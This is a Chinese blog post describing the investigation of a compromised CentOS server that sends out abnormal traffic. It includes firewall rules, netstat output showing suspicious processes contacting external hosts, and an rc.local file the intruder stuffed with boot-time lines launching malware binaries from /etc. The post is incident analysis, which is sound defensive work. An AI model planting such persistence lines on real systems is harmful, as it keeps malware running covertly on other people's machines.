linux-流量异常高怎么处理

这里就简单说说这个流量跑高。

  首先我从cacti 中监控到了一台放在机房的服务器流量异常，何为异常这里说一下：本身这台服务器交换机中限制带宽为两兆峰值，而他却可以跑到100M，按正常情况来说，当你的服务器流量跑满的时候，你的机器会很卡、远程连接会掉线或者根本连不上，所以正常流量来看，是绝对不会跑到100M的，所以这叫流量异常。下面给大家看一下图：

一、  

那么当我发现异常后，我就查资料表找出这台机器的IP地址还有系统信息等等。

  最终判定这是一台CentOS 5.4 密码为数字加大小写。以下是我查看到的一些信息：

[root@aaa ~]# iptables -L -n
Chain INPUT (policy DROP)
target     prot opt source               destination
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:8080
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:80
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:22
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

 这是防火墙规则

[root@aaa ~]# netstat -anpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name
tcp        0      0 0.0.0.0:60003               0.0.0.0:                   LISTEN      3552/cupsdd
tcp        0      0 0.0.0.0:5801                0.0.0.0:                   LISTEN      2569/Xvnc
tcp        0      0 0.0.0.0:5802                0.0.0.0:                   LISTEN      2613/Xvnc
tcp        0      0 0.0.0.0:3306                0.0.0.0:                   LISTEN      2506/mysqld
tcp        0      0 0.0.0.0:14379               0.0.0.0:                   LISTEN      3516/ora_d000_thdb
tcp        0      0 0.0.0.0:5803                0.0.0.0:                   LISTEN      2674/Xvnc
tcp        0      0 0.0.0.0:5901                0.0.0.0:                   LISTEN      2569/Xvnc
tcp        0      0 0.0.0.0:5902                0.0.0.0:                   LISTEN      2613/Xvnc
tcp        0      0 0.0.0.0:5903                0.0.0.0:                   LISTEN      2674/Xvnc
tcp        0      0 119.57.51.103:80            221.209.56.114:27808        SYN_RECV    -
tcp        0      0 119.57.51.103:80            221.209.56.114:27807        SYN_RECV    -
tcp        0      0 119.57.51.103:80            206.217.132.75:2229         SYN_RECV    -
tcp        0      0 119.57.51.103:80            121.232.7.242:51370         SYN_RECV    -
tcp        0      0 119.57.51.103:80            182.185.216.13:53534        SYN_RECV    -
tcp        0      0 119.57.51.103:80            111.161.23.92:37697         SYN_RECV    -
tcp        0      0 119.57.51.103:80            157.55.35.96:18323          SYN_RECV    -
tcp        0      0 119.57.51.103:80            125.39.163.95:30525         SYN_RECV    -
tcp        0      0 119.57.51.103:80            183.3.87.80:51903           SYN_RECV    -
tcp        0      0 119.57.51.103:80            221.209.56.114:27806        SYN_RECV    -
tcp        0      0 119.57.51.103:80            221.209.56.114:27809        SYN_RECV    -
tcp        0      0 0.0.0.0:1521                0.0.0.0:                   LISTEN      3426/tnslsnr
tcp        0      0 0.0.0.0:6001                0.0.0.0:                   LISTEN      2569/Xvnc
tcp        0      0 0.0.0.0:6002                0.0.0.0:                   LISTEN      2613/Xvnc
tcp        0      0 0.0.0.0:6003                0.0.0.0:*                   LISTEN      2674/Xvnc
tcp        0      1 127.0.0.1:50865             127.0.0.1:1521              SYN_SENT    3494/ora_pmon_thdb
tcp        0      0 119.57.51.103:32005         202.103.178.76:10991        ESTABLISHED 3648/atdd
tcp        0      0 119.57.51.103:32007         202.103.178.76:10991        ESTABLISHED 4059/atdd
tcp        0      0 119.57.51.103:32006         202.103.178.76:10991        ESTABLISHED 3760/atdd
tcp        0      0 119.57.51.103:32008         202.103.178.76:10991        ESTABLISHED 3881/atdd
tcp        0      0 119.57.51.103:32011         202.103.178.76:10991        ESTABLISHED 4472/atdd
tcp        0      0 119.57.51.103:32012         202.103.178.76:10991        ESTABLISHED 4300/atdd
tcp        0      0 119.57.51.103:32015         202.103.178.76:10991        ESTABLISHED 4617/atdd
tcp        0      0 119.57.51.103:32014         202.103.178.76:10991        ESTABLISHED 4198/atdd
tcp        0      0 119.57.51.103:64255         121.12.110.96:10991         ESTABLISHED 3558/ksapd
tcp        0      0 119.57.51.103:64259         121.12.110.96:10991         ESTABLISHED 3832/ksapd
tcp        0      0 119.57.51.103:64258         121.12.110.96:10991         ESTABLISHED 3652/ksapd
tcp        0      0 119.57.51.103:64257         121.12.110.96:10991         ESTABLISHED 4527/ksapd
tcp        0      1 119.57.51.103:51903         112.90.252.76:10991         SYN_SENT    4544/kysapd
tcp        0      1 119.57.51.103:51902         112.90.252.76:10991         SYN_SENT    4365/kysapd
tcp        0      1 119.57.51.103:51901         112.90.252.76:10991         SYN_SENT    4291/kysapd
tcp        0      1 119.57.51.103:51900         112.90.252.76:10991         SYN_SENT    3978/kysapd
tcp        0      1 119.57.51.103:51899         112.90.252.76:10991         SYN_SENT    3878/kysapd
tcp        0      1 119.57.51.103:51898         112.90.252.76:10991         SYN_SENT    4154/kysapd
tcp        0      1 119.57.51.103:51897         112.90.252.76:10991         SYN_SENT    3709/kysapd
tcp        0      1 119.57.51.103:51896         112.90.252.76:10991         SYN_SENT    3604/kysapd
tcp        0      1 127.0.0.1:5369              127.0.0.1:6113              SYN_SENT    3426/tnslsnr
tcp        0      0 :::80                       :::                        LISTEN      2879/httpd
tcp        0      0 :::6001                     :::                        LISTEN      2569/Xvnc
tcp        0      0 :::6002                     :::                        LISTEN      2613/Xvnc
tcp        0      0 :::6003                     :::                        LISTEN      2674/Xvnc
tcp        0      0 :::22                       :::*                        LISTEN      2448/sshd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.34.74:57650   TIME_WAIT   -
tcp        0     64 ::ffff:119.57.51.103:22     ::ffff:119.57.180.130:46177 ESTABLISHED 6691/sshd: root@not
tcp        0  29866 ::ffff:119.57.51.103:80     ::ffff:157.55.32.154:24818  FIN_WAIT1   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:218.106.154.11:14554 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:218.106.154.11:13526 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:180.173.86.128:1107  TIME_WAIT   -
tcp        0   6692 ::ffff:119.57.51.103:22     ::ffff:114.250.249.21:56821 ESTABLISHED 7269/0
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:182.118.19.211:10424 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.190.138.140:35502 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:221.224.14.222:59613 FIN_WAIT2   7271/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:221.224.14.222:59615 ESTABLISHED 7506/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:221.224.14.222:59614 FIN_WAIT2   7507/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:221.224.14.222:59611 FIN_WAIT2   7505/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:183.60.214.28:55574  TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:182.118.19.109:46068 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.34.74:63141   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.34.74:11155   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:182.118.19.127:54739 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:218.106.154.11:15706 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:221.224.14.222:59617 FIN_WAIT2   7509/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:221.224.14.222:59616 FIN_WAIT2   7508/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:218.106.154.11:13094 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:182.118.28.30:29387  TIME_WAIT   -
tcp        0      1 ::ffff:119.57.51.103:80     ::ffff:125.39.172.32:37149  LAST_ACK    -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.34.74:56558   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:218.106.154.11:13315 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:81.91.9.160:57503    FIN_WAIT2   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:81.91.9.160:57499    FIN_WAIT2   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:183.60.213.114:45041 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30624 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:182.118.21.34:16701  ESTABLISHED 7450/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30626 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30627 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30628 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30620 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.35.96:58678   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:206.217.132.75:2132  FIN_WAIT2   7276/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.35.96:50474   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:61.55.192.181:3096   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:61.55.192.181:3095   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:61.55.192.181:3094   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:61.55.192.181:3093   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:81.91.9.160:57505    FIN_WAIT2   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.35.96:64322   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:182.118.19.84:61477  TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8203     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8200     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8204     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8218     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30754 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8211     TIME_WAIT   -
tcp        0  37440 ::ffff:119.57.51.103:80     ::ffff:118.250.130.121:7924 ESTABLISHED 6929/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8210     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:157.55.35.96:38531   TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8214     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8213     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:49.81.2.181:8212     TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:9503 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:9504 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:61.55.192.181:3231   FIN_WAIT2   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:61.55.192.181:3230   FIN_WAIT2   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:110.177.0.129:60133  ESTABLISHED 7518/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:110.177.0.129:60132  ESTABLISHED 7512/httpd
tcp        0  21900 ::ffff:119.57.51.103:80     ::ffff:157.55.33.50:48368   ESTABLISHED 7514/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:9530 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:110.177.0.129:60134  ESTABLISHED 7442/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:110.177.0.129:60129  ESTABLISHED 7516/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:9532 FIN_WAIT2   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:110.177.0.129:60131  ESTABLISHED 7517/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:110.177.0.129:60130  ESTABLISHED 7519/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:9543 TIME_WAIT   -
tcp        0      1 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:8519 LAST_ACK    -
tcp        0      1 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:8520 LAST_ACK    -
tcp        0      1 ::ffff:119.57.51.103:80     ::ffff:111.164.196.141:8521 LAST_ACK    -
tcp        0   2602 ::ffff:119.57.51.103:80     ::ffff:157.55.35.96:12748   FIN_WAIT1   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:121.232.7.242:51371  TIME_WAIT   -
tcp        0   1331 ::ffff:119.57.51.103:80     ::ffff:182.185.216.13:53468 ESTABLISHED 7440/httpd
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30810 TIME_WAIT   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:81.91.9.160:57459    FIN_WAIT2   -
tcp        0      0 ::ffff:119.57.51.103:80     ::ffff:60.176.253.144:30812 TIME_WAIT   -

 这是监听的端口及运行的进程 可以看到好多atdd ksapd kysapd 还有一个cupsdd 这些都是不正常的进程

[root@aaa ~]# cat /etc/rc.local
#!/bin/sh

This script will be executed after all the other init scripts.

You can put your own initialization stuff in here if you don't

want to do the full Sys V style init stuff.

nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd
nohup /etc/cupsdd > /dev/null 2>&1&
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd

 这是我的rc.local 文件 被加入了好多东西，网查发现正是这些东西导致服务器大量向外发包

  那以上就是这次案例的一些文字东西了，在这里向大家说一声密码一定不能简单化，尤其是公网IP，处理方法的话就把他随机器启动的一些文件全部删除，把他添加的一些东西删除掉，不过  强烈建议重新做系统，安全要做好！
————————————————
版权声明：本文为CSDN博主「RedHat-小怪兽」的原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/redhat_xiaoguaishou/article/details/19042147